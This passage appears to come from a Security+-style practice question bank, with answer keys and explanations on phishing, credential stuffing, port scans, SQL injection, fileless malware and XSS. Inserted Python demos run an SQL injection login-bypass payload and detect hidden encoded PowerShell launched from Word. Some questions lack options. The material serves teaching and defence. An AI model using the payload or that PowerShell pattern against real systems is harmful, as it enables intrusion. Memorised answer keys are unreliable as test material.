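    return con.execute(sql, (username, password_hash)).fetchone() is not None


if __name__ == "__main__":
    con = open_demo_db()
    print(build_vulnerable_sql(PAYLOAD, "wrong"))
    print("vulnerable:    ", login_vulnerable(con, PAYLOAD, "wrong"))      # True
    print("parameterized: ", login_parameterized(con, PAYLOAD, "wrong"))   # False
```

Printing the concatenated statement makes the bypass visible: the WHERE clause collapses to `username = '' OR '1'='1'`, which every row satisfies. Escaping quotes would block this particular string, but parameterization removes the whole class because the query structure is fixed before any input is seen.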
An accounts payable clerk receives an email that continues a real vendor conversation from last week. The sender domain is only one character different from the vendor's real address. The message says the invoice is overdue and asks the clerk to update the payment account before the end of the day. What is the best next action?
A. Reply to the email asking for confirmation of the new bank details.
B. Verify the request using a known phone number or portal from previous records before taking action.
C. Forward the email to the vendor's entire contact list to warn them immediately.
D. Open the attached invoice to check whether the payment information matches past records.
Answer: B
Using a known out-of-band contact method confirms whether the request is legitimate without trusting the suspicious email path.
Why this answer
Option B is correct because the email exhibits classic signs of a business email compromise (BEC) attack: a spoofed sender domain (typosquatting) and urgent payment redirection. The best next action is to verify the request out-of-band using a trusted phone number or portal from previous records, as this bypasses any compromised email channels and confirms the legitimacy of the request before any financial loss occurs.
Exam trap
The trap here is that candidates may think opening the attachment to check payment details is a safe verification step, but in reality, attachments in phishing emails are a common vector for malware delivery, and the correct action is always to verify through a trusted, independent channel.
How to eliminate wrong answers
Option A is wrong because replying to the email could reach the attacker if the sender domain is spoofed or the account is compromised, and asking for confirmation via email does not provide any security verification. Option C is wrong because forwarding the email to the vendor's entire contact list could spread phishing links or malware, and it may cause unnecessary panic or further compromise other recipients. Option D is wrong because opening the attached invoice could execute malware or lead to credential harvesting, and checking payment information against past records does not verify the authenticity of the sender or the request.
A security analyst receives an alert from the email security gateway about a message sent to an employee. The email has an attachment named 'Invoice_Q4_2024.exe'. The employee claims they did not open the attachment, and the email appears to come from a known vendor's domain but the sender address has a slight typo. Which type of attack is most likely being attempted?
A. Spear phishing
B. Phishing
C. Smishing
D. Vishing
Answer: B
Phishing is a social engineering attack that uses deceptive emails and malicious attachments to trick recipients into executing malware or revealing sensitive information. The typo-squatted sender address and executable attachment are classic indicators of a phishing attempt.
Why this answer
The email contains a malicious executable attachment ('Invoice_Q4_2024.exe') and uses a spoofed sender address with a typo to impersonate a known vendor. This is a classic phishing attack because it is a broad, unsolicited attempt to trick the recipient into executing malware, without any personalized targeting beyond the generic invoice lure. The slight typo in the sender domain indicates domain spoofing, a common phishing technique that exploits the lack of SPF/DKIM validation.
Exam trap
CompTIA often tests the distinction between phishing and spear phishing by including a generic lure (like 'Invoice_Q4_2024.exe') that lacks personalization, which immediately disqualifies spear phishing even if the sender appears to be a known entity.
How to eliminate wrong answers
Option A is wrong because spear phishing requires the attacker to research and personalize the message for a specific individual or role, whereas this email uses a generic 'Invoice' subject line and attachment name, indicating a mass-distributed campaign. Option C is wrong because smishing (SMS phishing) uses text messages (SMS) as the attack vector, not email with an executable attachment. Option D is wrong because vishing (voice phishing) uses phone calls or voicemail to deceive victims, not email attachments.
A SOC analyst sees many login attempts against one SaaS account from hundreds of IPs over 20 minutes. Most passwords are valid-looking, but only a few result in successful logons, and the successful attempts use a password pattern that was exposed in a public breach list. What is the best mitigation to reduce this attack?
C. Disable account lockouts to avoid user inconvenience.
D. Allow unlimited retries so legitimate users are never blocked.
Answer: B
This attack is consistent with credential stuffing, where attackers reuse passwords taken from prior breaches across many accounts. Breached-password screening helps stop users from choosing known-compromised passwords, and MFA adds a second barrier if a password is guessed or reused. Together, these controls reduce the chance that stolen credentials will work at scale. The scenario's pattern of many IPs and a small number of successful logins is exactly the kind of activity these controls are meant to disrupt.
Why this answer
Option B is correct because the attack uses passwords from a public breach list, so breached-password screening would block those known compromised passwords. Additionally, MFA would stop the attacker even if they use a valid breached password, as they lack the second factor. This combination directly addresses the two key weaknesses: reused breached passwords and the lack of additional authentication.
Exam trap
The trap here is that candidates often focus on preventing brute-force attempts (e.g., lockouts) rather than recognizing that the attack uses valid breached passwords, making password screening and MFA the correct defense.
How to eliminate wrong answers
Option A is wrong because increasing password length requirements does not prevent the use of passwords that are already exposed in a breach list; attackers can still use long but compromised passwords. Option C is wrong because disabling account lockouts would allow the attacker to continue brute-force attempts indefinitely without triggering any defense, increasing the risk of successful logons.
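As an added example (not part of the original page), the detection logic for the pattern in this question (one account, many source addresses, a handful of successes inside a short window) next to the breached-password screening control the answer recommends. The event layout, thresholds and the breached-password list are constructed for the demonstration.

```python
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2024, 11, 2, 9, 0, 0)


def build_sample_events():
    """Constructed authentication events: (time, account, source_ip, success).
    One account is hit from 42 different addresses inside 20 minutes with two
    successes; a second account shows ordinary activity from one address."""
    events = []
    for i in range(40):  # failures, each from a different source address
        events.append((T0 + timedelta(seconds=25 * i), "j.doe@example.com",
                       f"198.51.100.{i + 1}", False))
    events.append((T0 + timedelta(minutes=17), "j.doe@example.com", "203.0.113.21", True))
    events.append((T0 + timedelta(minutes=18), "j.doe@example.com", "203.0.113.77", True))
    for i in range(3):  # normal user, one workstation, spread over the morning
        events.append((T0 + timedelta(hours=i), "a.lee@example.com", "10.0.0.31", True))
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=20), min_ips=20):
    """Flag accounts that see at least min_ips distinct source addresses inside one
    window. Returns {account: {"distinct_ips", "attempts", "successes"}}.
    The success count matters: a few successes among many sources is the
    credential-stuffing signature, not a lockout-style brute force."""
    by_account = defaultdict(list)
    for ev in events:
        by_account[ev[1]].append(ev)
    findings = {}
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e[0])
        for i, first in enumerate(evs):
            # all events for this account within `window` of the i-th event
            span = [e for e in evs[i:] if e[0] - first[0] <= window]
            ips = {e[2] for e in span}
            if len(ips) >= min_ips:
                findings[account] = {
                    "distinct_ips": len(ips),
                    "attempts": len(span),
                    "successes": sum(1 for e in span if e[3]),
                }
                break  # one finding per account is enough
    return findings


# Constructed stand-in for a breached-password corpus: only SHA-1 digests of the
# exposed passwords are kept, never the plaintext. A real deployment would query a
# breached-credential service rather than a local set.
BREACHED_SHA1 = {
    hashlib.sha1(p.encode()).hexdigest().upper()
    for p in ("Winter2024!", "Password1", "Company123")
}


def is_breached(password: str, corpus=BREACHED_SHA1) -> bool:
    """Breached-password screening: reject a candidate whose digest is in the corpus."""
    return hashlib.sha1(password.encode()).hexdigest().upper() in corpus


if __name__ == "__main__":
    for account, info in detect_credential_stuffing(build_sample_events()).items():
        print(f"possible credential stuffing against {account}: {info}")
    print("Winter2024! accepted?", not is_breached("Winter2024!"))
```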
A firewall analyst reviews logs and sees one external IP address sending connection attempts to TCP ports 22, 80, 139, 445, and 3389 on dozens of internal hosts every few seconds. No payloads are delivered and no sessions are established. What is the most likely activity?
A. Port scanning, because the source is systematically probing many ports and hosts for exposed services.
B. Reflection-based denial-of-service, because the attacker is using third-party systems to amplify traffic.
C. Man-in-the-middle, because the attacker is intercepting communications between internal hosts.
D. Protocol abuse, because the attacker is sending malformed traffic to crash services.
Answer: A
This is a classic port scanning pattern. The attacker is checking multiple ports across many systems with short, repeated attempts and no real session establishment. That behavior is consistent with reconnaissance before exploitation.
Why this answer
The observed behavior—a single external IP sending connection attempts to multiple TCP ports (22, 80, 139, 445, 3389) across many internal hosts at regular intervals—is the hallmark of a port scan. The absence of payload delivery or session establishment confirms the attacker is only probing for open services, not attempting exploitation or data transfer. This matches the definition of a reconnaissance activity, specifically a horizontal port scan targeting common service ports.
Exam trap
The trap here is that candidates may confuse a port scan with a denial-of-service attack because of the high frequency of connection attempts, but the key distinction is that no sessions are established and no payloads are delivered, which rules out DoS and exploitation.
How to eliminate wrong answers
Option B is wrong because reflection-based denial-of-service (e.g., NTP amplification) relies on spoofed source IPs and large response payloads from third-party servers, not direct connection attempts from a single external IP with no sessions established. Option C is wrong because man-in-the-middle attacks require the attacker to position themselves between communicating hosts (e.g., via ARP spoofing or rogue access points), not to send unsolicited connection probes from an external address. Option D is wrong because protocol abuse involves sending malformed or non-compliant traffic to trigger crashes or vulnerabilities, whereas this traffic is standard TCP SYN packets with no payload, and no sessions are established to deliver malformed data.
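As an added example (not part of the original page), a detector for the horizontal port-scan pattern described above, run over constructed firewall log lines: one source touching the question's ports on several internal hosts with no session established. The log format, field names and thresholds are assumptions, not those of any particular firewall.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed (constructed) firewall log format; real appliances differ.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=tcp result=(?P<result>\S+)$"
)

# Constructed sample: one external address probing the ports from the question on
# several internal hosts with no completed handshake, plus a normal client.
SAMPLE_LOG = """\
2024-11-02T10:15:01Z src=203.0.113.7 dst=10.0.0.12 dport=22 proto=tcp result=no-session
2024-11-02T10:15:02Z src=203.0.113.7 dst=10.0.0.12 dport=80 proto=tcp result=no-session
2024-11-02T10:15:03Z src=203.0.113.7 dst=10.0.0.12 dport=139 proto=tcp result=no-session
2024-11-02T10:15:04Z src=203.0.113.7 dst=10.0.0.12 dport=445 proto=tcp result=no-session
2024-11-02T10:15:05Z src=203.0.113.7 dst=10.0.0.12 dport=3389 proto=tcp result=no-session
2024-11-02T10:15:08Z src=203.0.113.7 dst=10.0.0.13 dport=22 proto=tcp result=no-session
2024-11-02T10:15:09Z src=203.0.113.7 dst=10.0.0.13 dport=445 proto=tcp result=no-session
2024-11-02T10:15:12Z src=203.0.113.7 dst=10.0.0.14 dport=3389 proto=tcp result=no-session
2024-11-02T10:15:15Z src=203.0.113.7 dst=10.0.0.15 dport=445 proto=tcp result=no-session
2024-11-02T10:15:16Z src=198.51.100.4 dst=10.0.0.12 dport=443 proto=tcp result=established
2024-11-02T10:15:40Z src=198.51.100.4 dst=10.0.0.13 dport=22 proto=tcp result=established
this line is malformed and is skipped by the parser
"""


def parse_line(line: str):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
    ev["dport"] = int(ev["dport"])
    return ev


def detect_port_scans(log_text: str, window=timedelta(minutes=5), min_hosts=3, min_ports=3):
    """Flag a source as scanning when, inside one time window, it touches at least
    min_hosts distinct hosts and min_ports distinct ports and establishes no session.
    Returns {src: {"hosts": n, "ports": [...], "attempts": n}} for flagged sources."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)

    findings = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        for i, first in enumerate(events):
            # all events from this source within `window` of the i-th event
            span = [e for e in events[i:] if e["ts"] - first["ts"] <= window]
            hosts = {e["dst"] for e in span}
            ports = {e["dport"] for e in span}
            established = sum(1 for e in span if e["result"] == "established")
            if len(hosts) >= min_hosts and len(ports) >= min_ports and established == 0:
                findings[src] = {"hosts": len(hosts), "ports": sorted(ports), "attempts": len(span)}
                break  # one finding per source is enough
    return findings


if __name__ == "__main__":
    for src, info in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {info}")
```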
An employee gets a text message saying their mobile carrier will suspend service unless they tap a link and verify their account details. What type of attack is this?
A. Smishing, because the attacker is using SMS messages to trick the user
B. Vishing, because the attacker is using a voice call to pressure the user
C. Baiting, because the attacker is offering a free service upgrade
D. Tailgating, because the attacker is trying to enter a building behind someone else
Answer: A
Smishing is phishing delivered through text messages, often with urgent account or delivery claims.
Why this answer
This is smishing because the attacker uses SMS (Short Message Service) as the delivery vector to send a fraudulent message that tricks the recipient into clicking a malicious link. Smishing is a form of social engineering that exploits the trust users place in text-based communications from known entities like mobile carriers, often leading to credential theft or malware installation.
Exam trap
The trap here is that candidates may confuse smishing with vishing because both involve phishing via telecommunications, but the key differentiator is the medium: SMS (text) versus voice call.
How to eliminate wrong answers
Option B is wrong because vishing (voice phishing) relies on voice calls, not SMS text messages, to deceive the victim. Option C is wrong because baiting involves offering something enticing (e.g., a free download or USB drive) to lure the victim into an action, not sending a threatening SMS about service suspension. Option D is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, which has no relation to SMS-based deception.
A developer wants to reduce the risk of SQL injection in a new customer search form. Which two changes are the best mitigations? Select two.
Select 2 answers
A. Use parameterized queries or prepared statements for all database access.
B. Validate and constrain user input before it reaches the database layer.
C. Store the database password in the page source so the app can connect faster.
D. Disable TLS so the application can inspect requests more easily.
E. Allow the application to build SQL statements by concatenating raw user input.
Answers: A, B
Parameterized queries keep user input separate from the SQL command structure, which blocks injection attacks effectively.
Why this answer
Option A is correct because parameterized queries and prepared statements separate SQL logic from user-supplied data, ensuring that input is treated as a literal value rather than executable code. This prevents attackers from injecting malicious SQL commands into the query string, as the database driver automatically escapes or binds parameters safely. This is the most effective defense against SQL injection attacks.
Exam trap
The trap here is that candidates may think input validation alone is sufficient, but the exam emphasizes that parameterized queries are the definitive mitigation, while validation is a secondary defense-in-depth layer.
Based on the exhibit, what is the MOST likely activity taking place on the network?
A user opened a spreadsheet shortly before unusual internal connection patterns began. The same account is now authenticating to many hosts in rapid succession.
A. A worm is flooding the network with broadcast traffic and exhausting bandwidth.
B. An attacker is performing lateral movement using stolen credentials and remote administration tools.
C. A malicious insider is exfiltrating data through a cloud sync application.
D. A misconfigured printer is repeatedly scanning the subnet for available services.
Answer: B
The mix of SMB, WinRM, remote logons, Kerberos activity, and PsExec service creation is consistent with movement from one compromised workstation to multiple internal hosts.
Why this answer
The exhibit shows a user opening a spreadsheet (likely a phishing vector) followed by rapid authentication attempts from the same account to many hosts. This pattern matches lateral movement using stolen credentials, where an attacker uses remote administration tools like PsExec, WinRM, or RDP to move across the network after initial compromise.
Exam trap
The trap here is confusing lateral movement with network scanning or data exfiltration; candidates often overlook that the same account authenticating to many hosts is a hallmark of credential-based lateral movement, not a misconfiguration or worm.
How to eliminate wrong answers
Option A is wrong because a worm flooding broadcast traffic would generate excessive broadcast packets (e.g., ARP or ICMP floods), not sequential authentication events to specific hosts. Option C is wrong because data exfiltration via cloud sync would show outbound traffic to cloud storage APIs, not internal authentication bursts. Option D is wrong because a misconfigured printer scanning the subnet would use protocols like SNMP or mDNS discovery, not repeated authentication attempts with the same user account.
An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.
Select 2 answers
A. PowerShell was launched with encoded, hidden execution arguments from a document process.
B. A WMI permanent event subscription was created under the root\subscription namespace.
C. A new executable named updater.exe was copied into Program Files by an administrator.
D. The browser cache was cleared after a routine user sign-out.
E. A signed video driver updated successfully through Windows Update.
Answers: A, B
Encoded and hidden PowerShell launched from a document process is a strong fileless malware indicator. The attack uses built-in scripting rather than dropping a traditional executable, which helps evade file-based detections. In combination with a user-facing process like Word, this pattern commonly suggests initial execution through malicious content or macro abuse.
Why this answer
Option A is correct because the use of winword.exe to launch powershell.exe with `-nop -w hidden -enc` arguments is a classic fileless execution technique. The encoded command runs entirely in memory without writing a payload to disk, and the launch from a document process (winword.exe) indicates a macro or exploit-based initial access, consistent with a fileless compromise.
Exam trap
The trap here is that candidates may think any persistence mechanism (like a new executable in Program Files) is fileless, but fileless specifically means no executable written to disk, and WMI subscriptions are a common fileless persistence vector.
After a user installs a free PDF converter from an unofficial website, the laptop starts making periodic outbound connections to an unknown server, the browser homepage changes, and a new program launches at logon. What is the most likely malware type?
A. Worm
B. Trojan
C. Rootkit
D. Ransomware
Answer: B
This is the best answer because the malicious software was disguised as a useful free tool. The symptoms include persistence, browser changes, and communication with an unknown server, which are common signs of a trojan payload. Trojans often arrive through deceptive downloads and then install additional harmful behavior after execution.
Why this answer
The user downloaded and installed a program that appears legitimate (a PDF converter) but performs malicious actions: making outbound connections, changing browser settings, and adding a startup program. This is the classic behavior of a Trojan horse, which disguises itself as useful software to trick users into installing it, then executes hidden malicious functions. Unlike worms, Trojans do not self-replicate, and unlike ransomware or rootkits, the described symptoms focus on unauthorized remote access and persistence rather than file encryption or deep OS concealment.
Exam trap
The trap here is that candidates may confuse the self-replicating behavior of a worm with the user-initiated installation of a Trojan, or mistake the visible symptoms (browser change, startup entry) for a rootkit's stealth, when in fact Trojans often exhibit overt persistence mechanisms to maintain access.
How to eliminate wrong answers
Option A is wrong because a worm self-replicates and spreads across networks without user interaction, whereas this infection required the user to manually install a program. Option C is wrong because a rootkit is designed to hide its presence and maintain privileged access by subverting OS-level detection mechanisms, not to change browser homepages or add visible startup entries. Option D is wrong because ransomware typically encrypts files and demands payment, displaying a ransom note, whereas the described symptoms involve outbound connections and browser changes without file encryption or extortion.
A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?
A. Require password changes every 30 days for all users.
B. Use phishing-resistant MFA such as FIDO2 or WebAuthn.
C. Turn off all external email to eliminate the chance of future messages.
D. Use single sign-on without MFA so users authenticate only once.
Answer: B
Phishing-resistant multifactor authentication is the strongest choice here because it prevents a stolen password from being enough to log in. The attacker already harvested credentials through a fake login page, so a second factor that cannot be easily replayed from another site directly disrupts the attack path. FIDO2 or WebAuthn reduces the value of captured passwords and helps stop account takeover even when users are deceived by convincing impersonation emails. This is a practical defense against credential phishing and replay.
Why this answer
Phishing-resistant MFA, such as FIDO2 or WebAuthn, directly prevents account takeover even when a password is stolen because these methods use public-key cryptography and origin-bound credentials. The fake login page cannot intercept the private key or replay the authentication, so the attacker cannot sign in from a new country despite having the password.
Exam trap
The trap here is that candidates often choose password rotation (Option A) as a security best practice, but the question specifically asks for the control that most directly reduces successful account takeover when a password is already stolen, which is phishing-resistant MFA, not password aging.
How to eliminate wrong answers
Option A is wrong because requiring password changes every 30 days does not prevent an attacker from using a stolen password immediately; it only reduces the window of exposure after the fact, and frequent changes can actually encourage weaker passwords. Option C is wrong because turning off all external email is an impractical and overly restrictive measure that does not address the core issue of credential theft; attackers could still use other vectors like internal phishing or compromised accounts. Option D is wrong because single sign-on without MFA consolidates authentication to a single point of failure; if the password is stolen, the attacker gains access to all linked systems without additional barriers.
A development team wants to allow users to search orders by customer name and date range. Logs show the team currently concatenates the filter values into SQL strings. Which change best reduces SQL injection risk without removing the search feature?
A. Escape apostrophes in the input before building the SQL statement.
B. Use parameterized queries or prepared statements for the search filters.
C. Disable database error messages so attackers cannot see query details.
D. Place the application behind a VPN so only internal users can run searches.
Answer: B
Parameterized queries separate code from data, so user input is treated as values rather than executable SQL. This allows the search function to remain flexible while dramatically reducing injection risk. Prepared statements are the preferred fix because they address the root cause instead of relying on brittle string handling.
Why this answer
Option B is correct because parameterized queries (also known as prepared statements) separate SQL logic from user data by sending the query structure and parameters independently to the database. This ensures that user-supplied filter values are always treated as data, never as executable SQL code, which completely prevents SQL injection even if the input contains malicious characters like apostrophes or SQL keywords.
Exam trap
The trap here is that candidates often choose input escaping (Option A) because it seems like a direct fix for the apostrophe problem, but they fail to recognize that parameterized queries are the only comprehensive defense that eliminates the entire class of SQL injection vulnerabilities regardless of input format.
How to eliminate wrong answers
Option A is wrong because escaping apostrophes alone does not protect against all SQL injection vectors, such as numeric fields, stacked queries, or time-based blind injection, and escaping can be bypassed if not done consistently or if the database uses a different escape character. Option C is wrong because disabling database error messages only hides error details from attackers; it does not prevent the injection itself, and an attacker can still exploit the vulnerability using blind SQL injection techniques. Option D is wrong because placing the application behind a VPN does not address the root cause of SQL injection; it only restricts network access, and the vulnerability remains exploitable by any authenticated user who can reach the application.
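As an added example (not part of the original page), the `' OR '1'='1'--` login bypass from the earlier SQL injection question reproduced against an in-memory SQLite database, beside the parameterized form that this question and the customer search question recommend, and a numeric-field case showing why escaping apostrophes alone falls short. The schema, sample rows and the `1 OR 1=1` input are constructed for the demonstration.

```python
import sqlite3

# The username payload quoted in the login question.
PAYLOAD = "' OR '1'='1'--"


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a users table for the login check and an
    orders table for the customer-name / date-range search."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'correct-horse');
        CREATE TABLE orders (id INTEGER, customer TEXT, order_date TEXT);
        INSERT INTO orders VALUES (1, 'O''Brien', '2024-10-02');
        INSERT INTO orders VALUES (2, 'Smith', '2024-11-15');
        INSERT INTO orders VALUES (3, 'Smith', '2025-01-20');
        """
    )
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable form: input is spliced into the SQL text. The payload closes the
    string, appends OR '1'='1', and the trailing -- comments out the password check."""
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened form: the driver binds the values separately from the statement, so
    the payload is compared as a literal username and simply does not match."""
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


def search_orders(conn: sqlite3.Connection, customer: str, start: str, end: str) -> list:
    """Parameterized search filters keep the feature intact: a name containing an
    apostrophe (O'Brien) is just data, and the date range is bound the same way."""
    rows = conn.execute(
        "SELECT id FROM orders WHERE customer = ? AND order_date BETWEEN ? AND ? "
        "ORDER BY id",
        (customer, start, end),
    ).fetchall()
    return [r[0] for r in rows]


def escape_quotes(value: str) -> str:
    """The 'escape apostrophes' idea from option A of the search question."""
    return value.replace("'", "''")


def orders_by_id_escaped(conn: sqlite3.Connection, order_id: str) -> list:
    """Why escaping alone is not enough: a numeric field is not quoted, so an input
    with no apostrophe at all ('1 OR 1=1') passes the escaper unchanged and still
    rewrites the WHERE clause."""
    sql = "SELECT id FROM orders WHERE id = " + escape_quotes(order_id) + " ORDER BY id"
    return [r[0] for r in conn.execute(sql).fetchall()]


if __name__ == "__main__":
    db = make_db()
    print("concatenated login with payload  :", login_concatenated(db, PAYLOAD, "wrong"))
    print("parameterized login with payload :", login_parameterized(db, PAYLOAD, "wrong"))
    print("Smith orders in 2024             :", search_orders(db, "Smith", "2024-01-01", "2024-12-31"))
    print("escaped numeric filter '1 OR 1=1':", orders_by_id_escaped(db, "1 OR 1=1"))
```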
A finance laptop is opened to review an invoice attachment. EDR then shows winword.exe launching powershell.exe with hidden, no-profile, and base64-encoded arguments. No executable is written to disk, network beacons begin from memory, and after a reboot the activity disappears unless the document is opened again. What type of malware behavior is most likely?
A. Worm behavior, because the infection would self-replicate across systems through the network.
B. Fileless attack, because malicious code runs in memory and leaves little or no executable artifact on disk.
C. Rootkit behavior, because the malware is hidden from normal user-mode tools.
D. Ransomware, because the user opened an invoice attachment before the suspicious activity started.
Answer: B
This is a classic fileless attack pattern. The process chain from a trusted Office app to hidden PowerShell, the encoded command line, the lack of a new binary on disk, and the disappearance after reboot all point to code executing primarily in memory. That makes detection harder and often means the initial document or script acts as the launcher rather than a traditional dropper.
Why this answer
The scenario describes malicious code that executes entirely in memory without writing an executable to disk, which is the defining characteristic of a fileless attack. Winword.exe launching PowerShell with hidden, no-profile, and base64-encoded arguments is a classic technique to load and execute payloads directly in memory, bypassing traditional file-based detection. The fact that activity disappears after reboot unless the document is reopened confirms that no persistent artifact remains on disk, further supporting fileless behavior.
Exam trap
The trap here is that candidates may confuse the initial infection vector (opening an invoice) with the malware type (ransomware), but the key behavioral indicator is the in-memory execution and lack of disk artifacts, which points to fileless malware, not ransomware.
How to eliminate wrong answers
Option A is wrong because worm behavior requires self-replication across systems via network propagation, and there is no evidence of lateral movement or self-copying in this scenario. Option C is wrong because rootkit behavior involves hiding processes, files, or registry keys from the operating system, typically by intercepting system calls, whereas this attack runs in user-mode memory without hiding its presence from EDR. Option D is wrong because ransomware would typically encrypt files and demand payment, but the description only shows beaconing and no file encryption or ransom note, so the invoice attachment is merely the initial vector, not the malware type.
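As an added example (not part of the original page), detection logic for the process chain described in this question and in the earlier WMI-subscription question: an Office parent launching powershell.exe with no-profile, hidden-window and encoded-command switches, with the base64 payload decoded for analyst review rather than executed, plus a check for event-subscription classes created under root\subscription. The event shape, the sample command lines and the encoded script are constructed.

```python
import base64
import binascii

# Parent processes from which an encoded, hidden PowerShell launch is suspicious.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Classes that make up a permanent WMI event subscription (filter, consumers, binding).
WMI_PERSISTENCE_CLASSES = {"__eventfilter", "commandlineeventconsumer",
                           "activescripteventconsumer", "__filtertoconsumerbinding"}


def _is_flag(token: str, full_name: str, min_len: int) -> bool:
    """PowerShell accepts unambiguous prefixes of its switches (-nop for -noprofile,
    -w for -windowstyle, -enc or -e for -encodedcommand)."""
    return len(token) >= min_len and full_name.startswith(token)


def decode_encoded_command(b64: str):
    """-EncodedCommand carries UTF-16LE text in base64; return it, or None if invalid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_process_event(parent_image: str, image: str, command_line: str) -> dict:
    """Return the indicators found in one process-creation event and, when present,
    the decoded command so an analyst can read it without running it."""
    tokens = command_line.split()
    lowered = [t.lower() for t in tokens]
    indicators = []
    decoded = None
    if parent_image.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        indicators.append("office-parent")
    for i, tok in enumerate(lowered):
        if _is_flag(tok, "-noprofile", 4):
            indicators.append("no-profile")
        elif _is_flag(tok, "-windowstyle", 2) and i + 1 < len(lowered) and lowered[i + 1] == "hidden":
            indicators.append("hidden-window")
        elif _is_flag(tok, "-encodedcommand", 2) and i + 1 < len(tokens):
            indicators.append("encoded-command")
            decoded = decode_encoded_command(tokens[i + 1])
    is_powershell = image.lower().rsplit("\\", 1)[-1] in POWERSHELL_IMAGES
    suspicious = is_powershell and "office-parent" in indicators and "encoded-command" in indicators
    return {"suspicious": suspicious, "indicators": indicators, "decoded_command": decoded}


def is_wmi_persistence(namespace: str, class_name: str) -> bool:
    """A permanent WMI event subscription lives in root\\subscription; creation of its
    filter, consumer or binding classes there is the persistence finding from option B."""
    return namespace.lower() == "root\\subscription" and class_name.lower() in WMI_PERSISTENCE_CLASSES


# Constructed sample events. The encoded script is harmless text built here, not a
# captured payload; the benign event is an administrator running a script by path.
SAMPLE_SCRIPT = "Write-Host 'constructed sample, not a real payload'"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENT = ("C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}")
BENIGN_EVENT = ("C:\\Windows\\explorer.exe",
                "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "powershell.exe -File C:\\Scripts\\inventory.ps1")

if __name__ == "__main__":
    for ev in (SAMPLE_EVENT, BENIGN_EVENT):
        print(analyze_process_event(*ev))
    print("WMI persistence:", is_wmi_persistence("root\\subscription", "CommandLineEventConsumer"))
```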
Based on the exhibit, what vulnerability is the application most likely suffering from?
A. Stored cross-site scripting, because attacker-controlled script is saved and later rendered to other users.
B. Command injection, because the script attempts to send cookies to a remote host.
C. Session fixation, because users saw the same review page after posting.
D. Insecure deserialization, because the payload is embedded in a review field.
Answer: A
Stored cross-site scripting is correct because the malicious script was submitted once, saved by the application, and then executed for other visitors when the review was displayed. The evidence of requests to the attacker domain confirms that the browser executed the injected script and exposed user data.
Why this answer
The application stores user-supplied input in a review field and later renders it to other users without proper sanitization. The exhibit shows a script tag attempting to exfiltrate cookies to a remote host, which is a classic stored cross-site scripting (XSS) payload. Because the malicious script is persisted on the server and executed in the browsers of subsequent visitors, the vulnerability is stored XSS.
Exam trap
CompTIA often tests the distinction between stored XSS and reflected XSS, where candidates may confuse the persistence of the payload (stored) with the immediate reflection of input (reflected), or they may incorrectly associate cookie exfiltration with command injection rather than client-side scripting.
How to eliminate wrong answers
Option B is wrong because command injection involves injecting operating system commands into a server-side process (e.g., via shell metacharacters like `;` or `|`), not sending cookies via JavaScript; the script's behavior of exfiltrating cookies is a client-side action, not server-side command execution. Option C is wrong because session fixation requires an attacker to force a known session ID on a user before login, and the scenario describes a review page being displayed after posting, which is unrelated to session ID manipulation. Option D is wrong because insecure deserialization exploits the deserialization of untrusted data objects (e.g., PHP or Java serialized objects) to execute arbitrary code, whereas the payload here is a simple script tag embedded in a text field, not a serialized object.
A public website is overwhelmed by a flood of DNS responses arriving from many open resolvers after the attacker sends small forged queries to those resolvers. The target bandwidth is saturated and the source IPs vary widely. What kind of attack is being used?
DNS amplification uses small spoofed requests to trigger much larger replies from reflectors, multiplying traffic toward the victim.
Why this answer
B is correct because this scenario describes a DNS amplification DDoS attack. The attacker sends small forged DNS queries with a spoofed source IP (the victim's IP) to open resolvers, which respond with much larger DNS replies. The flood of amplified responses saturates the victim's bandwidth, and the varying source IPs make mitigation difficult. This matches the description of a reflection/amplification attack using DNS.
Exam trap
The trap here is confusing a DNS amplification attack with a SYN flood because both involve flooding, but the key differentiator is the use of DNS responses from open resolvers versus incomplete TCP handshakes.
How to eliminate wrong answers
